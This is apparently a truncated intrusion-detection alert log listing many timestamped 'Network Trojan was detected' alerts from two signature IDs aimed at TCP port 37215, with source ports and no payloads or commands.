          Timestamp:06/08/24-15:05:50.881297
          SID:2835222
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177577
          SID:2829579
          Source Port:52566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780717
          SID:2829579
          Source Port:52948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2835222
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116534
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132864
          SID:2835222
          Source Port:36632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732219
          SID:2829579
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302446
          SID:2835222
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132981
          SID:2829579
          Source Port:57986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191885
          SID:2829579
          Source Port:38830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044326
          SID:2835222
          Source Port:58472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153728
          SID:2829579
          Source Port:44196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407832
          SID:2829579
          Source Port:59398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241180
          SID:2835222
          Source Port:43108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891440
          SID:2829579
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114408
          SID:2829579
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161285
          SID:2829579
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729380
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019944
          SID:2835222
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2835222
          Source Port:56930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352754
          SID:2829579
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175274
          SID:2835222
          Source Port:56608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466180
          SID:2829579
          Source Port:44322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394382
          SID:2829579
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355106
          SID:2835222
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783735
          SID:2829579
          Source Port:45520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857462
          SID:2835222
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602530
          SID:2829579
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078450
          SID:2835222
          Source Port:60048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461656
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780723
          SID:2829579
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670527
          SID:2829579
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792776
          SID:2829579
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108811
          SID:2835222
          Source Port:53452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789575
          SID:2829579
          Source Port:60052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159038
          SID:2829579
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733607
          SID:2835222
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040389
          SID:2835222
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448526
          SID:2835222
          Source Port:43368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892323
          SID:2829579
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860965
          SID:2829579
          Source Port:56120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783811
          SID:2835222
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066270
          SID:2835222
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902272
          SID:2829579
          Source Port:44076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405400
          SID:2829579
          Source Port:40796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448963
          SID:2835222
          Source Port:46266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262496
          SID:2829579
          Source Port:53802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175005
          SID:2835222
          Source Port:60596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239284
          SID:2835222
          Source Port:55618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730455
          SID:2835222
          Source Port:37310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110667
          SID:2829579
          Source Port:54672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269898
          SID:2835222
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274758
          SID:2829579
          Source Port:54410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516383
          SID:2829579
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829860
          SID:2835222
          Source Port:44872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070986
          SID:2829579
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799987
          SID:2835222
          Source Port:60088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158405
          SID:2829579
          Source Port:48334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175406
          SID:2829579
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354863
          SID:2829579
          Source Port:33356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446751
          SID:2829579
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849718
          SID:2829579
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440808
          SID:2835222
          Source Port:37410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.069535
          SID:2829579
          Source Port:51850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188329
          SID:2835222
          Source Port:49052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516637
          SID:2835222
          Source Port:46086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799640
          SID:2829579
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793475
          SID:2829579
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675140
          SID:2835222
          Source Port:33230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552174
          SID:2835222
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039445
          SID:2835222
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132832
          SID:2835222
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887969
          SID:2835222
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732326
          SID:2829579
          Source Port:57152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044953
          SID:2829579
          Source Port:53500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730835
          SID:2829579
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542374
          SID:2835222
          Source Port:57756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813128
          SID:2835222
          Source Port:40474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912745
          SID:2835222
          Source Port:57022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444945
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513194
          SID:2829579
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787847
          SID:2829579
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791672
          SID:2829579
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188934
          SID:2829579
          Source Port:36064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448870
          SID:2829579
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749204
          SID:2835222
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705853
          SID:2829579
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128830
          SID:2835222
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461804
          SID:2829579
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242549
          SID:2835222
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173033
          SID:2829579
          Source Port:42840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446803
          SID:2835222
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739184
          SID:2835222
          Source Port:41962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175752
          SID:2829579
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812726
          SID:2835222
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128739
          SID:2835222
          Source Port:51232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513621
          SID:2835222
          Source Port:55048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792065
          SID:2835222
          Source Port:57096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673611
          SID:2829579
          Source Port:37828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112361
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039567
          SID:2829579
          Source Port:57748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891838
          SID:2829579
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811811
          SID:2829579
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130184
          SID:2829579
          Source Port:51920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554393
          SID:2829579
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742056
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354407
          SID:2835222
          Source Port:58116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741052
          SID:2835222
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815567
          SID:2829579
          Source Port:41258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704439
          SID:2835222
          Source Port:56966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071373
          SID:2829579
          Source Port:53786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470681
          SID:2829579
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747757
          SID:2829579
          Source Port:36844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180912
          SID:2835222
          Source Port:52400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440962
          SID:2835222
          Source Port:37034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402010
          SID:2829579
          Source Port:53834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516175
          SID:2835222
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897168
          SID:2835222
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496022
          SID:2835222
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078849
          SID:2829579
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018473
          SID:2829579
          Source Port:40290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274745
          SID:2829579
          Source Port:52080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547277
          SID:2829579
          Source Port:48692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037202
          SID:2835222
          Source Port:44026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783449
          SID:2829579
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516478
          SID:2829579
          Source Port:56540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707319
          SID:2835222
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509762
          SID:2829579
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444911
          SID:2829579
          Source Port:56728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741976
          SID:2829579
          Source Port:35068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792544
          SID:2829579
          Source Port:35856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896448
          SID:2829579
          Source Port:34158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813001
          SID:2829579
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780965
          SID:2835222
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188770
          SID:2835222
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788501
          SID:2835222
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732370
          SID:2835222
          Source Port:41880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109432
          SID:2829579
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067840
          SID:2835222
          Source Port:49586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270838
          SID:2829579
          Source Port:39692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353781
          SID:2835222
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084837
          SID:2829579
          Source Port:34222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512041
          SID:2829579
          Source Port:57128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135620
          SID:2829579
          Source Port:39300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353328
          SID:2829579
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542897
          SID:2835222
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017364
          SID:2829579
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467112
          SID:2835222
          Source Port:54834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744216
          SID:2835222
          Source Port:37384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2835222
          Source Port:54286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747620
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552326
          SID:2835222
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042668
          SID:2829579
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546730
          SID:2835222
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239213
          SID:2835222
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240581
          SID:2829579
          Source Port:51714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259156
          SID:2835222
          Source Port:57780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356356
          SID:2835222
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240379
          SID:2829579
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601217
          SID:2835222
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160291
          SID:2829579
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747218
          SID:2835222
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911728
          SID:2835222
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108620
          SID:2829579
          Source Port:40864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2835222
          Source Port:47210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163265
          SID:2835222
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517367
          SID:2829579
          Source Port:49830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604692
          SID:2835222
          Source Port:53852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600841
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546646
          SID:2829579
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161030
          SID:2829579
          Source Port:55608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258689
          SID:2829579
          Source Port:53952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470599
          SID:2835222
          Source Port:32802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261281
          SID:2835222
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237507
          SID:2835222
          Source Port:56620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548127
          SID:2829579
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733148
          SID:2835222
          Source Port:39568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466387
          SID:2835222
          Source Port:36080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465969
          SID:2829579
          Source Port:58334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741790
          SID:2835222
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449653
          SID:2835222
          Source Port:51472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160401
          SID:2835222
          Source Port:44562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262805
          SID:2835222
          Source Port:39078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729798
          SID:2829579
          Source Port:45270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668663
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242223
          SID:2829579
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107676
          SID:2829579
          Source Port:55206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463110
          SID:2835222
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671729
          SID:2829579
          Source Port:50680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706149
          SID:2829579
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269355
          SID:2835222
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911558
          SID:2835222
          Source Port:53502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441391
          SID:2835222
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016113
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671728
          SID:2829579
          Source Port:43250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183924
          SID:2829579
          Source Port:40088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787096
          SID:2829579
          Source Port:44318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446241
